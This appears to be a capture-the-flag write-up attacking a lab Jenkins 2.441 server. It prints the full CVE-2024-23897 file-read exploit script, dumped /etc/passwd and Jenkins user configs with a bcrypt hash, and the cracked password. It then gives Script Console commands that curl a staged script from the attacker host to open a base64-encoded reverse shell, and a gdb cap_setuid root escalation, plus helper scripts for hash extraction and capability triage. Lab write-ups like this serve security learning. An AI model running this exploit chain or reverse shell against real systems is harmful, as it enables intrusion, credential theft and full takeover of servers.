┌──(root㉿kali)-[~]
└─# arp-scan -I eth1 -l
Interface: eth1, type: EN10MB, MAC: 00:0c:29:26:ba:73, IPv4: 192.168.56.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:13 (Unknown: locally administered)
192.168.56.100 08:00:27:17:db:03 PCS Systemtechnik GmbH
192.168.56.117 08:00:27:52:a0:a6 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.185 seconds (117.16 hosts/sec). 3 responded

┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.56.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-26 06:00 EST
Nmap scan report for 192.168.56.117
Host is up (0.00034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 fa:b1:dc:5b:9e:54:8c:bd:24:4c:43:0c:25:fd:4d:d8 (ECDSA)
|_ 256 29:71:69:ca:bc:74:48:26:45:34:77:69:29:a5:d2:fc (ED25519)
8080/tcp open http Jetty 10.0.18
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(10.0.18)
|_http-title: Starting Jenkins
MAC Address: 08:00:27:52:A0:A6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.34 ms 192.168.56.117

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.97 seconds

While the page was loading I noticed the browser kept requesting a 5.32 IP, so I blocked it.


The Jenkins version (2.441) is shown directly in the bottom-right corner of the page.


┌──(root㉿kali)-[~]
└─# searchsploit Jenkins 2.441
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Jenkins 2.441 - Local File Inclusion | java/webapps/51993.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

┌──(root㉿kali)-[~]
└─# searchsploit -m java/webapps/51993.py
Exploit: Jenkins 2.441 - Local File Inclusion
URL: https://www.exploit-db.com/exploits/51993
Path: /usr/share/exploitdb/exploits/java/webapps/51993.py
Codes: CVE-2024-23897
Verified: False
File Type: Python script, ASCII text executable
Copied to: /root/51993.py



┌──(root㉿kali)-[~]
└─# cat 51993.py
# Exploit Title: Jenkins 2.441 - Local File Inclusion
# Date: 14/04/2024
# Exploit Author: Matisse Beckandt (Backendt)
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip
# Version: 2.441
# Tested on: Debian 12 (Bookworm)
# CVE: CVE-2024-23897

from argparse import ArgumentParser
from requests import Session, post, exceptions
from threading import Thread
from uuid import uuid4
from time import sleep
from re import findall


class Exploit(Thread):
    # One thread keeps the "download" half of the CLI's HTTP duplex channel
    # open and prints whatever Jenkins writes back; the main thread sends the
    # "upload" half carrying the command.
    def __init__(self, url: str, identifier: str):
        Thread.__init__(self)
        self.daemon = True
        self.url = url
        self.params = {"remoting": "false"}
        self.identifier = identifier
        self.stop_thread = False
        self.listen = False

    def run(self):
        while not self.stop_thread:
            if self.listen:
                self.listen_and_print()

    def stop(self):
        self.stop_thread = True

    def receive_next_message(self):
        self.listen = True

    def wait_for_message(self):
        while self.listen:
            sleep(0.5)

    def print_formatted_output(self, output: str):
        if "ERROR: No such file" in output:
            print("File not found.")
        elif "ERROR: Failed to parse" in output:
            print("Could not read file.")

        # Every line of the target file was treated as a node name by
        # connect-node, so each one comes back inside a "No such agent" error.
        expression = "No such agent \"(.*)\" exists."
        results = findall(expression, output)
        print("\n".join(results))

    def listen_and_print(self):
        session = Session()
        headers = {"Side": "download", "Session": self.identifier}
        try:
            response = session.post(self.url, params=self.params, headers=headers)
        except (exceptions.ConnectTimeout, exceptions.ConnectionError):
            print("Could not connect to target to setup the listener.")
            exit(1)

        self.print_formatted_output(response.text)
        self.listen = False

    def send_file_request(self, filepath: str):
        headers = {"Side": "upload", "Session": self.identifier}
        payload = get_payload(filepath)
        try:
            post(self.url, data=payload, params=self.params, headers=headers, timeout=4)
        except (exceptions.ConnectTimeout, exceptions.ConnectionError):
            print("Could not connect to the target to send the request.")
            exit(1)

    def read_file(self, filepath: str):
        self.receive_next_message()
        sleep(0.1)
        self.send_file_request(filepath)
        self.wait_for_message()


def get_payload_message(operation_index: int, text: str) -> bytes:
    # Frame as the script builds it: 4-byte big-endian length, 1-byte opcode,
    # then the UTF-8 string prefixed with its 2-byte length. The byte order is
    # given explicitly so this also runs on Python < 3.11, where to_bytes()
    # has no default.
    text_bytes = bytes(text, "utf-8")
    text_size = len(text_bytes)
    text_message = text_size.to_bytes(2, "big") + text_bytes
    message_size = len(text_message)

    payload = message_size.to_bytes(4, "big") + operation_index.to_bytes(1, "big") + text_message
    return payload


def get_payload(filepath: str) -> bytes:
    arg_operation = 0    # opcode 0: a command-line argument
    start_operation = 3  # opcode 3: start executing the command

    # args4j expands an "@file" argument into the file's contents, one
    # argument per line, before connect-node ever sees it (CVE-2024-23897).
    command = get_payload_message(arg_operation, "connect-node")
    poisoned_argument = get_payload_message(arg_operation, f"@{filepath}")

    payload = command + poisoned_argument + start_operation.to_bytes(1, "big")
    return payload


def start_interactive_file_read(exploit: Exploit):
    print("Press Ctrl+C to exit")
    while True:
        filepath = input("File to download:\n> ")
        filepath = make_path_absolute(filepath)
        exploit.receive_next_message()

        try:
            exploit.read_file(filepath)
        except exceptions.ReadTimeout:
            print("Payload request timed out.")


def make_path_absolute(filepath: str) -> str:
    # Relative paths resolve against the Jenkins process's working directory.
    if not filepath.startswith('/'):
        return f"/proc/self/cwd/{filepath}"
    return filepath


def format_target_url(url: str) -> str:
    if url.endswith('/'):
        url = url[:-1]
    return f"{url}/cli"


def get_arguments():
    parser = ArgumentParser(description="Local File Inclusion exploit for CVE-2024-23897")
    parser.add_argument("-u", "--url", required=True, help="The url of the vulnerable Jenkins service. Ex: http://helloworld.com/")
    parser.add_argument("-p", "--path", help="The absolute path of the file to download")
    return parser.parse_args()


def main():
    args = get_arguments()
    url = format_target_url(args.url)
    filepath = args.path
    identifier = str(uuid4())

    exploit = Exploit(url, identifier)
    exploit.start()

    if filepath:
        filepath = make_path_absolute(filepath)
        exploit.read_file(filepath)
        exploit.stop()
        return

    try:
        start_interactive_file_read(exploit)
    except KeyboardInterrupt:
        pass
    print("\nQuitting")
    exploit.stop()


if __name__ == "__main__":
    main()
┌──(root㉿kali)-[~]
└─#
┌──(root㉿kali)-[~]
└─# python3 51993.py -u http://192.168.56.117:8080/
Press Ctrl+C to exit
File to download:
> /etc/passwd
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
penetration:x:1001:1001::/home/penetration:/bin/bash
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
kali:x:1000:1000:asd:/home/kali:/bin/bash
root:x:0:0:root:/root:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
games:x:5:60:games:/usr/games:/usr/sbin/nologin
File to download:
>

The user flag can be read the same way.

Next, brute-force SSH directly.

┌──(root㉿kali)-[/tmp]
└─# vi user.txt

┌──(root㉿kali)-[/tmp]
└─# cp /root/yiyi/rockyou.txt /tmp

That turned up a password, but it did not seem to be of any use anywhere.

Reading up on it, Jenkins keeps its configuration under JENKINS_HOME, which here is /home/penetration/.jenkins (penetration is the account Jenkins runs as, see /etc/passwd above), and config.xml is readable through the same file read:

Reference: "Jenkins arbitrary file read (CVE-2024-23897) + extracting and cracking back-end user password hashes + reverse shell, end to end" (CSDN blog)

> /home/penetration/.jenkins/config.xml
<primaryView>all</primaryView>
<label></label>
<clouds/>
<disabledAdministrativeMonitors/>
</authorizationStrategy>
<hudson>
<excludeClientIPFromCrumb>false</excludeClientIPFromCrumb>
</hudson.model.AllView>
</crumbIssuer>
<disableRememberMe>false</disableRememberMe>
<authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
<slaveAgentPort>-1</slaveAgentPort>
<viewsTabBar class="hudson.views.DefaultViewsTabBar"/>
</hudson>
<numExecutors>2</numExecutors>
<disableSignup>true</disableSignup>
<properties class="hudson.model.View$PropertyList"/>
</views>
<globalNodeProperties/>
<enableCaptcha>false</enableCaptcha>
<workspaceDir>${JENKINS_HOME}/workspace/${ITEM_FULL_NAME}</workspaceDir>
<denyAnonymousReadAccess>false</denyAnonymousReadAccess>
<scmCheckoutRetryCount>0</scmCheckoutRetryCount>
<?xml version='1.1' encoding='UTF-8'?>
</securityRealm>
<projectNamingStrategy class="jenkins.model.ProjectNamingStrategy$DefaultProjectNamingStrategy"/>
<crumbIssuer class="hudson.security.csrf.DefaultCrumbIssuer">
<name>all</name>
<nodeProperties/>
<markupFormatter class="hudson.markup.EscapedMarkupFormatter"/>
<views>
<useSecurity>true</useSecurity>
<buildsDir>${ITEM_ROOTDIR}/builds</buildsDir>
<jdks/>
<version>2.441</version>
<owner class="hudson" reference="../../.."/>
<nodeRenameMigrationNeeded>false</nodeRenameMigrationNeeded>
<filterExecutors>false</filterExecutors>
<filterQueue>false</filterQueue>
<securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
<myViewsTabBar class="hudson.views.DefaultMyViewsTabBar"/>
<hudson.model.AllView>
<mode>NORMAL</mode>
File to download:

Note that the lines come back shuffled. The exploit feeds the file to connect-node as an @file argument, whose expansion turns each line into a separate node name; connect-node deduplicates those names into a hash set before reporting "No such agent" for each, so the lines are printed in hash order and duplicate lines collapse into one. Every line is intact, which is all that matters for what follows.

There is also users.xml, which maps user ids to their directories under users/:

> /home/penetration/.jenkins/users/users.xml
<?xml version='1.1' encoding='UTF-8'?>
<idToDirectoryNameMap class="concurrent-hash-map">
<entry>
<string>an0ma1_6703692303677686036</string>
<version>1</version>
<string>an0ma1</string>
</hudson.model.UserIdMapper>
</idToDirectoryNameMap>
<hudson.model.UserIdMapper>
</entry>

The entry gives the user's directory name:

an0ma1_6703692303677686036


> /home/penetration/.jenkins/users/an0ma1_6703692303677686036/config.xml
<hudson.search.UserSearchProperty>
<roles>
<jenkins.security.seed.UserSeedProperty>
</hudson.search.UserSearchProperty>
</tokenStore>
<properties>
<flags/>
<jenkins.security.LastGrantedAuthoritiesProperty>
<hudson.model.MyViewsProperty>
</user>
<id>an0ma1</id>
</jenkins.security.ApiTokenProperty>
<views>
<org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.200.vb_9327d658781">
<string>authenticated</string>
<user>
<name>all</name>
<collapsed/>
</jenkins.security.seed.UserSeedProperty>
<com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@1337.v60b_d7b_c7b_c9f">
</org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>
</hudson.model.MyViewsProperty>
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>
<triggers/>
<filterQueue>false</filterQueue>
<passwordHash>#jbcrypt:$2a$10$3Ms0ektq3Nt8FBV8WeISb.Y.Xh81/VsOhZAhn5xhXzTZEFlsmGm76</passwordHash>
</views>
<jenkins.security.ApiTokenProperty>
</hudson.model.PaneStatusProperties>
</hudson.tasks.Mailer_-UserProperty>
<emailAddress>1594743209@qq.com</emailAddress>
<jenkins.console.ConsoleUrlProviderUserProperty/>
<tokenList/>
</hudson.model.AllView>
</hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>
<owner class="hudson.model.MyViewsProperty" reference="../../.."/>
</properties>
<timestamp>1712972655377</timestamp>
<hudson.model.TimeZoneProperty/>
</jenkins.model.experimentalflags.UserExperimentalFlagsProperty>
</com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>
<insensitiveSearch>true</insensitiveSearch>
<hudson.security.HudsonPrivateSecurityRealm_-Details>
<properties class="hudson.model.View$PropertyList"/>
<hudson.model.AllView>
</hudson.security.HudsonPrivateSecurityRealm_-Details>
<seed>e9885566be638620</seed>
<providerId>default</providerId>
<jenkins.model.experimentalflags.UserExperimentalFlagsProperty>
</roles>
</jenkins.security.LastGrantedAuthoritiesProperty>
<hudson.model.PaneStatusProperties>
<hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.105">
<?xml version='1.1' encoding='UTF-8'?>
<version>10</version>
<hudson.tasks.Mailer_-UserProperty plugin="mailer@472.vf7c289a_4b_420">
<filterExecutors>false</filterExecutors>
<tokenStore>
<io.jenkins.plugins.thememanager.ThemeUserProperty plugin="theme-manager@215.vc1ff18d67920"/>
<fullName>Mike</fullName>

Run it through hashcat. Copy only the bcrypt string after the #jbcrypt: marker ($2a$10$...) into hash.txt; mode 3200 is bcrypt:

hashcat -m 3200 -a 0 hash.txt rockyou.txt
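As an added example (not code from the write-up or from Jenkins), the extraction step done programmatically: pair the id with its directory from users.xml, pull the hash out of that user's config.xml, strip the #jbcrypt: marker and produce the hashcat input. It works on the shuffled lines the exploit returns, which is why it uses line regexes rather than an XML parser. The sample inputs are the write-up's own output reduced to the relevant lines; the optional verification uses the third-party bcrypt package and assumes jBCrypt's $2a$ output is standard bcrypt.

```python
"""Pull a Jenkins local user's bcrypt hash out of JENKINS_HOME/users and
prepare it for hashcat -m 3200.

Added example for this write-up, not code from the post or from Jenkins.
It deliberately uses line-oriented regexes instead of an XML parser: the
CVE-2024-23897 read returns the file's lines in arbitrary order, so the
output is not a well-formed document, but every line is still intact.
"""
import re
from typing import Optional

JBCRYPT_PREFIX = "#jbcrypt:"   # marker Jenkins puts in front of the bcrypt string
HASHCAT_MODE_BCRYPT = 3200
# $2a$<cost>$<22-char salt><31-char hash>, the layout jBCrypt writes.
BCRYPT_RE = re.compile(r"^\$2[abxy]\$(?P<cost>\d{2})\$[./A-Za-z0-9]{53}$")

# Constructed samples: the users.xml and user config.xml lines from the
# write-up, in the shuffled order the exploit returned them.
USERS_XML = """\
<?xml version='1.1' encoding='UTF-8'?>
<idToDirectoryNameMap class="concurrent-hash-map">
<entry>
<string>an0ma1_6703692303677686036</string>
<version>1</version>
<string>an0ma1</string>
</hudson.model.UserIdMapper>
</idToDirectoryNameMap>
<hudson.model.UserIdMapper>
</entry>
"""

USER_CONFIG_XML = """\
<hudson.search.UserSearchProperty>
<id>an0ma1</id>
<passwordHash>#jbcrypt:$2a$10$3Ms0ektq3Nt8FBV8WeISb.Y.Xh81/VsOhZAhn5xhXzTZEFlsmGm76</passwordHash>
<hudson.security.HudsonPrivateSecurityRealm_-Details>
<seed>e9885566be638620</seed>
<fullName>Mike</fullName>
"""


def user_directories(users_xml: str) -> dict:
    """Map user id -> directory under users/ from users.xml.

    Line order is not trustworthy, so the two <string> values of an <entry>
    are paired by shape: the directory name is the id plus an underscore and
    a numeric suffix (UserIdMapper layout), e.g. an0ma1_6703692303677686036.
    """
    strings = re.findall(r"<string>([^<]+)</string>", users_xml)
    known = set(strings)
    mapping = {}
    for value in strings:
        m = re.fullmatch(r"(.+)_\d+", value)
        if m and m.group(1) in known:
            mapping[m.group(1)] = value
    return mapping


def extract_password_hash(config_xml: str) -> Optional[str]:
    """Bare bcrypt string from <passwordHash>, or None if the user has none
    (no HudsonPrivateSecurityRealm details, e.g. an LDAP/SSO user)."""
    m = re.search(r"<passwordHash>([^<]+)</passwordHash>", config_xml)
    if not m:
        return None
    value = m.group(1).strip()
    if not value.startswith(JBCRYPT_PREFIX):
        raise ValueError(f"unexpected passwordHash encoding: {value[:12]}...")
    bcrypt_hash = value[len(JBCRYPT_PREFIX):]
    if not BCRYPT_RE.match(bcrypt_hash):
        raise ValueError("passwordHash is not a well-formed bcrypt string")
    return bcrypt_hash


def bcrypt_cost(bcrypt_hash: str) -> int:
    """Work factor (2**cost rounds); the hash in the write-up uses 10."""
    return int(BCRYPT_RE.match(bcrypt_hash)["cost"])


def hashcat_line(user_id: str, bcrypt_hash: str) -> str:
    """user:hash line for `hashcat -m 3200 --username`; without --username
    hashcat wants the bare hash, i.e. the part after the first colon."""
    return f"{user_id}:{bcrypt_hash}"


def check_password(candidate: str, bcrypt_hash: str) -> Optional[bool]:
    """Offline check of one candidate with the `bcrypt` package (assumption:
    jBCrypt's $2a$ hashes are standard bcrypt). None if it is not installed."""
    try:
        import bcrypt
    except ImportError:
        return None
    return bcrypt.checkpw(candidate.encode(), bcrypt_hash.encode())


if __name__ == "__main__":
    for user_id, directory in user_directories(USERS_XML).items():
        print(f"{user_id}: read users/{directory}/config.xml")
        h = extract_password_hash(USER_CONFIG_XML)
        if h:
            print(f"hash.txt line: {hashcat_line(user_id, h)} (cost {bcrypt_cost(h)}, mode {HASHCAT_MODE_BCRYPT})")
            print("offline check of '369258':", check_password("369258", h))
```

A wordlist loop over check_password is a last resort: at cost 10, bcrypt from Python is far slower than hashcat, which is why the write-up hands the hash to hashcat -m 3200.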


369258

With that, the login succeeds. The config.xml read earlier shows FullControlOnceLoggedInAuthorizationStrategy, so any logged-in user is an administrator, and the Script Console (Manage Jenkins -> Script Console, /script) runs arbitrary Groovy inside the Jenkins JVM as the account Jenkins runs as (penetration):

println "cat /etc/passwd".execute().text

image-20241226194520576

Now for the reverse shell. Groovy's String.execute() hands the string to the JVM's process launcher split on whitespace, without a shell, so the redirections in a bash one-liner would not work if passed to execute() directly; staging the one-liner in a script and running that script with /bin/bash sidesteps this. First encode it on the attacking machine (base64, not base64 -d, produces the string used next):

echo -n '/bin/sh -i >& /dev/tcp/192.168.56.102/4444 0>&1' | base64

The decode-and-run form that goes into the script:

echo -n 'L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEwMi80NDQ0IDA+JjE=' | base64 -d | /bin/bash

Save that line as 11.sh on the attacking machine and serve it with Python's http.server on port 80 (the curl URL below has no port), with a listener already waiting on 192.168.56.102:4444.

Pull it onto the target and execute it, again from the Script Console:

println "curl http://192.168.56.102/11.sh -o /tmp/11.sh".execute().text


println "chmod 777 /tmp/11.sh".execute().text
println "/bin/bash /tmp/11.sh".execute().text

The chmod is optional here: running the file through /bin/bash does not require the execute bit.

penetration@asd:/opt$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/snap/core20/2264/usr/bin/chfn
/snap/core20/2264/usr/bin/chsh
/snap/core20/2264/usr/bin/gpasswd
/snap/core20/2264/usr/bin/mount
/snap/core20/2264/usr/bin/newgrp
/snap/core20/2264/usr/bin/passwd
/snap/core20/2264/usr/bin/su
/snap/core20/2264/usr/bin/sudo
/snap/core20/2264/usr/bin/umount
/snap/core20/2264/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2264/usr/lib/openssh/ssh-keysign
/snap/core20/1405/usr/bin/chfn
/snap/core20/1405/usr/bin/chsh
/snap/core20/1405/usr/bin/gpasswd
/snap/core20/1405/usr/bin/mount
/snap/core20/1405/usr/bin/newgrp
/snap/core20/1405/usr/bin/passwd
/snap/core20/1405/usr/bin/su
/snap/core20/1405/usr/bin/sudo
/snap/core20/1405/usr/bin/umount
/snap/core20/1405/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1405/usr/lib/openssh/ssh-keysign
/snap/snapd/15534/usr/lib/snapd/snap-confine
/usr/bin/umount
/usr/bin/passwd
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/su
/usr/bin/pkexec
/usr/bin/mount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chfn
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/libexec/polkit-agent-helper-1
penetration@asd:/opt$ sudo -l
sudo -l
Matching Defaults entries for penetration on asd:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User penetration may run the following commands on asd:
(ALL) NOPASSWD: /opt/babyGift/vuln

getcap shows /usr/bin/gdb with cap_setuid=ep. The capability is in gdb's permitted and effective sets at exec, so gdb's embedded Python can call os.setuid(0) and the !sh that follows starts a shell as root; the sudo entry for /opt/babyGift/vuln is not needed.

penetration@asd:/opt$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/snap/core20/2264/usr/bin/ping cap_net_raw=ep
/snap/core20/1405/usr/bin/ping cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/gdb cap_setuid=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
penetration@asd:/opt$ gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
GNU gdb (Ubuntu 13.1-2ubuntu2.1) 13.1
Copyright (C) 2023 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
# whoami
whoami
root
#
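As an added example (not from the write-up), a triage of getcap output that generalises the step above: it separates the stock cap_net_raw entries from capabilities that are root-equivalent once you can run code under the binary, and distinguishes effective grants (=ep) from permitted-only ones (+p). The input is the write-up's getcap listing with three constructed lines added (an old-libcap "= cap+flags" line, a permitted-only capability and an empty line); the ROOT_EQUIVALENT set and the STOCK allow-list are this example's own assumptions, not an authoritative list.

```python
"""Triage `getcap -r / 2>/dev/null` output: which file capabilities hand a
local user root, and which are the stock noise (ping, mtr-packet)?

Added example for this write-up, not from the post. SAMPLE is the
write-up's getcap output plus three constructed lines (old libcap
"= cap+flags" syntax, a permitted-only capability, an empty line).
"""
import os
import re

# Assumption: capabilities that amount to root when the binary will run code
# we choose (interpreters, debuggers with an embedded interpreter, editors).
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner", "cap_setfcap", "cap_sys_rawio",
}
# Assumption: capabilities a stock install legitimately grants, by basename.
STOCK = {"ping": {"cap_net_raw"}, "mtr-packet": {"cap_net_raw"}}

# New libcap: "<path> cap_a,cap_b=ep"; old libcap: "<path> = cap_a,cap_b+ep".
LINE_RE = re.compile(
    r"^(?P<path>\S+)\s+=?\s*(?P<caps>[a-z_0-9,]+)[=+](?P<flags>[eip]+)$"
)

SAMPLE = """\
/snap/core20/2264/usr/bin/ping cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/gdb cap_setuid=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/local/bin/python3 = cap_setuid+p

/usr/local/bin/perl cap_dac_read_search=eip
"""


def parse_line(line: str):
    """-> (path, [caps], flags), or None for a line getcap did not produce."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m["path"], m["caps"].split(","), m["flags"]


def verdict(path: str, caps, flags: str) -> str:
    dangerous = set(caps) & ROOT_EQUIVALENT
    if dangerous and "e" in flags:
        # Effective at exec: the process holds the capability from the start,
        # so e.g. gdb's Python can call os.setuid(0) directly.
        return "escalate"
    if dangerous:
        # Permitted only: usable, but the program itself must first raise the
        # capability into its effective set with capset(2).
        return "escalate-permitted-only"
    if set(caps) <= STOCK.get(os.path.basename(path), set()):
        return "stock"
    return "review"


def triage(getcap_output: str) -> list:
    findings = []
    for line in getcap_output.splitlines():
        if not line.strip():
            continue
        parsed = parse_line(line)
        if parsed is None:
            findings.append({"path": line.strip(), "caps": [], "flags": "", "verdict": "unparsed"})
            continue
        path, caps, flags = parsed
        findings.append({"path": path, "caps": caps, "flags": flags,
                         "verdict": verdict(path, caps, flags)})
    return findings


def escalation_candidates(getcap_output: str) -> list:
    """Paths worth trying first, in the order getcap listed them."""
    return [f["path"] for f in triage(getcap_output) if f["verdict"].startswith("escalate")]


if __name__ == "__main__":
    for f in triage(SAMPLE):
        caps = ",".join(f["caps"])
        print(f"{f['verdict']:<24} {f['path']}  {caps}{'=' if caps else ''}{f['flags']}")
```

An "escalate" verdict alone does not make a binary exploitable: it also has to give you code execution, which gdb does through its embedded Python (the os.setuid(0) followed by !sh above). For "escalate-permitted-only" the program must first raise the capability into its effective set before setuid will succeed.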

And that's a wrap.